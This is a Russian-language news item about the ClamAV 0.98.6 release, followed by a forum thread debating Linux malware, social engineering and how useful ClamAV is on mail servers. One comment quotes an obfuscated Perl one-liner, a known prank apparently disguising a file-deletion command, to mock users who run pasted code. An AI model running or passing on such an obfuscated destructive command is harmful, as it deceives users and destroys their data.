Доступен (http://blog.clamav.net/2015/01/clamav-0986-has-been-released...) выпуск свободного антивирусного пакета ClamAV 0.98.6 (http://www.clamav.net/), в котором отмечены в основном исправления ошибок. Решены проблемы с установкой в OS X и FreeBSD, обеспечена совместимость c systemd схемы хранения pid. Устранено несколько потенциальных уязвимостией, вызванных переполнением буфера при обработке специально оформленных данных в форматах Yoda crypter, mew, upx, upack и  petite.

URL: http://blog.clamav.net/2015/01/clamav-0986-has-been-released...
Новость: https://www.opennet.ru/opennews/art.shtml?num=41554

• Выпуск свободного антивирусного пакета ClamAV 0.98.6,A.Stahl, 10:46 , 28-Янв-15
  • Выпуск свободного антивирусного пакета ClamAV 0.98.6,Аноним, 11:09 , 28-Янв-15
    • Выпуск свободного антивирусного пакета ClamAV 0.98.6,A.Stahl, 11:10 , 28-Янв-15
      • Выпуск свободного антивирусного пакета ClamAV 0.98.6,SHRDLU, 11:45 , 28-Янв-15
        • Выпуск свободного антивирусного пакета ClamAV 0.98.6,Аноним, 13:22 , 28-Янв-15
          • Выпуск свободного антивирусного пакета ClamAV 0.98.6,SHRDLU, 14:44 , 28-Янв-15
      • Выпуск свободного антивирусного пакета ClamAV 0.98.6,анонисимус, 11:54 , 28-Янв-15
    • Выпуск свободного антивирусного пакета ClamAV 0.98.6,anonymuse, 18:48 , 28-Янв-15
      • Выпуск свободного антивирусного пакета ClamAV 0.98.6,Аноним, 19:01 , 28-Янв-15
        • Выпуск свободного антивирусного пакета ClamAV 0.98.6,anonym0use, 19:25 , 28-Янв-15
          • Выпуск свободного антивирусного пакета ClamAV 0.98.6,3, 02:21 , 29-Янв-15
            • Выпуск свободного антивирусного пакета ClamAV 0.98.6,anonymice, 15:07 , 29-Янв-15
• Выпуск свободного антивирусного пакета ClamAV 0.98.6,JupLup, 11:48 , 28-Янв-15
  • Статистика использования антивирусов в Линукс ~10 лет.,Аноним, 17:19 , 28-Янв-15
• Выпуск свободного антивирусного пакета ClamAV 0.98.6,Какаянахренразница, 11:56 , 28-Янв-15
  • Выпуск свободного антивирусного пакета ClamAV 0.98.6,Аноним, 12:15 , 28-Янв-15
• Выпуск свободного антивирусного пакета ClamAV 0.98.6,Аноним, 12:06 , 28-Янв-15
  • Выпуск свободного антивирусного пакета ClamAV 0.98.6,Аноним, 13:23 , 28-Янв-15
    • Выпуск свободного антивирусного пакета ClamAV 0.98.6,тоже Аноним, 14:17 , 28-Янв-15
• Выпуск свободного антивирусного пакета ClamAV 0.98.6,Аноним, 12:07 , 28-Янв-15
  • Выпуск свободного антивирусного пакета ClamAV 0.98.6,Аноним, 12:18 , 28-Янв-15
    • Выпуск свободного антивирусного пакета ClamAV 0.98.6,Аноним, 12:32 , 28-Янв-15
  • Выпуск свободного антивирусного пакета ClamAV 0.98.6,Аноним, 13:23 , 28-Янв-15
  • Выпуск свободного антивирусного пакета ClamAV 0.98.6,XAnder, 13:54 , 28-Янв-15
• Выпуск свободного антивирусного пакета ClamAV 0.98.6,Аноним, 12:43 , 28-Янв-15
  • Выпуск свободного антивирусного пакета ClamAV 0.98.6,Templar3d, 12:57 , 28-Янв-15
    • Выпуск свободного антивирусного пакета ClamAV 0.98.6,Аноним, 13:24 , 28-Янв-15
• Выпуск свободного антивирусного пакета ClamAV 0.98.6,3, 10:20 , 29-Янв-15
  • Выпуск свободного антивирусного пакета ClamAV 0.98.6,Templar3d, 18:41 , 29-Янв-15

>выпуск свободного антивирусного пакета

А как у нас дела обстоят со свободными вирусами? :)

По-прежнему: чтобы собрать и запустить вирус под линем, надо неделю париться и код фиксить.

Т.е. есть таки вирусы под ЖПЛ или БСД?

На самом деле главный вопрос - есть ли современные вирусы, которые современный Клам может обнаружить?
Пяток лет назад он честно отрабатывал потраченное электричество на почтовом сервере. Сейчас, по ходу, только ресурсы отжирает - ладно, хоть немного.

Скажи, ты так и работаешь в РиК,Inc.?

Прекрасно обнаруживает, если настройки дэцул подкорректировать и поменьше исключений пихать. Сечешь?

> Прекрасно обнаруживает, если настройки дэцул подкорректировать и поменьше исключений
> пихать. Сечешь?

Настройки в студию или ЛПП.

Чтобы вирусы эти увидеть, нужно быть под LSD.

> чтобы собрать и запустить вирус под линем, надо неделю париться и код фиксить

Ну да, ну да.  Арчеводы-неуловимые-школоло продолжают свои ценные наблюдения :)

https://blogs.rsa.com/thieves-reaching-for-linux-hand-of-thi.../
> The Trojan’s developer claims it has been tested on 15 different Linux desktop distributions, including Ubuntu Fedora and Debian

Открою страшный секрет - злостному (кул)хацкеру вполне достаточно ваших паролей -- а что бы слямзить их, совершенно не нужен ни рут, ни тем более руткиты.

> в отчете RSA подчеркивается, что установка трояна на ваш компьютер невозможна без вашего участия

Потрясающе просто! Это прорыв.

>> в отчете RSA подчеркивается, что установка трояна на ваш компьютер невозможна без вашего участия
> Потрясающе просто! Это прорыв.

ВНЕЗАПНО -- то же самое верно и для венды, не? Или вы считаете, что там "ОНО само" как то устанавливается o_O?
И вообще - полная цита:
> Менеджеры по продажам этой хакерской программы советуют использовать методы почтовой и
> социальной инженерии для внедрения трояна на компьютер жертвы. Другими словами, вам
>  просто не следует переходить по подозрительным ссылкам, которые могут приходить к вам по
> почте или в социальных сетях. Но вы ведь и так это знаете, правда?

нет.

у винды нет реп, а устанавливая бесплатно без смс...

бесплатно: https://www.spotify.com/us/download/previews/ и без смс https://www.dropbox.com/en/help/246 ?
Т.е "хочешь установить наш софт -- добавь по быстрому левую репу!".

Причем, ведь ну совсем не обязательно устанавливать что то из реп -- tar -xf whatsapp_hacktool.tar (особенно через гуй)  и вперед. Ведь некоторые школьники^W похоже о стат. линковке и ABI слышать не слышали и всерьез считают, что юзверьспейс-софт для каждой версии ядра/всех возможных комбинаций либ нужно  кампилять отдельно.
Ну или таки всеми любимый

echo "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`~{;;y; -/:-@[-`{|~};`-{/" *-;;s;;$_;see'

как бы намекает ;).
А уж если используется очередная дырка в хромом или огнелисе, с помощью которой запускается/выполняется код, то вообще нет принципиальной разницы -- вся "вкуснота" с хомяка читается с правами юзверя и даже автозапуск в кде/гнуме/xfce реализуется без проблем.

Т.е запускать браузеры/сетевой софт из под разных юзверей?! НЕ пользоваться флешем, жабой и адобом, не добавлять 100500 левых реп? Паранойа же, нинужна же -- ведь линукс же!! Там магия и вообще +1000 на все кампутер-скиллы сразу при установке дистра! Почему-то, особенно арчеводы с бубунтоводами считают себя неуловимыми^W в безопастности просто по определению, а не потому что они никому не нужны =)

Вы всё еще верите в антивирусы?

Clamav  да ловит, очень много, и нужен - виндовые шары с правом записи, флешки с винды...

Clamav + HAVP когда-то ловил ~ 1 вирь в месяц у меня на линукс десктопе, http трафик.. Теперь nameserver 77.88.8.88 справляется наверно лучше.

chkrootkit и rkhunter - локально установлены, никогда ничего так и не поймали.. Наверно их с LiveCD надо раз в квартал пускать.

pax + grsec - в логах херячит каждый день что-то, толь баги, толь эксплоиты... Были бы разрабы адекватны можно было баги фиксить...

У кого есть антивирус? Чем вы его кормите? Где берёте вирусы?

Тоже хочу завести себе, но беда, что нет вирусов. Жалко, сдохнет ведь...

наведайтесь на бактериологический факультет ближайшего медунивера.
там обучаются перспективные антивирусы. дневной рацион стандартный, как и для особей любых других вузов - этанолосодержащая продукция, два пельменя, вилка.
приручение подходящих экземпляров - через конструктор копирования, пингование родительских классов и финальный mv её к себе из родительского каталога.
полноценная установка проводится менеджером "ZAGS".

2 года я без антивирусника дома на win7. а на лине темболее

> 2 года я без антивирусника дома на win7. а на лине темболее

Прими соболезнования. Ты давно тачку подарил в ботнет.

Вы таки не понимаете - это пишет бот, хозяин вообще не в курсе...

Это полный мусор, он никогда ничего не находил. Не ставьте.

> Это полный мусор, он никогда ничего не находил. Не ставьте.

Вы неверно его используете.
Данный антивирус нужен для поиска вирусов в основном в проходящем во внутерннюю сеть траффике и проверке расшаренных разделов с, в том числе, и виндовым софтом.
Под линем ессно не найдёт ничё.

Да он нигде никогда ничего не находит.

> Это полный мусор, он никогда ничего не находил. Не ставьте.

Ты его готовить не умеешь. Не трынди.

Иногда находит. Но редко. Использую на почтовом сервере. Продолжая тему https://www.opennet.ru/openforum/vsluhforumID3/95774.html#14 дополню, что за год пришли 48 зловредов, из которых Клам отловил 14, остальные врукопашную. В общем, эффективность крайне низкая, но не нулевая.

А он находит чего нибудь, нацеленного на линух? Его есть смысл ставить в дополнение к rkhunter и chkrootkit?

Нет. Но, на почтовом сервере Zimbra работает хорошо. Главное базы обновлять и его самого - будет все вирусы находить.
С ClamAV лучше, чем без него. По крайней мере на почтовике.

> Нет. Но, на почтовом сервере Zimbra работает хорошо. Главное базы обновлять и
> его самого - будет все вирусы находить.
> С ClamAV лучше, чем без него. По крайней мере на почтовике.

На проксе тоже хорошо. Количество заражений извне падает, и ощутимо. Внутренние источники, конечно, он не лечит. Но и не должен. Это другая часть медальки.

А вы говорите плохой антивирус

http://interface31.ru/tech_it/2012/12/naskolko-effektiven-cl...

:)))))

Чувак, ты из криокамеры зачем вышел? Марш назад. Сейчас 2015 год, а у тебя 2012.
Мир изменился - ClamAV купила Cisco.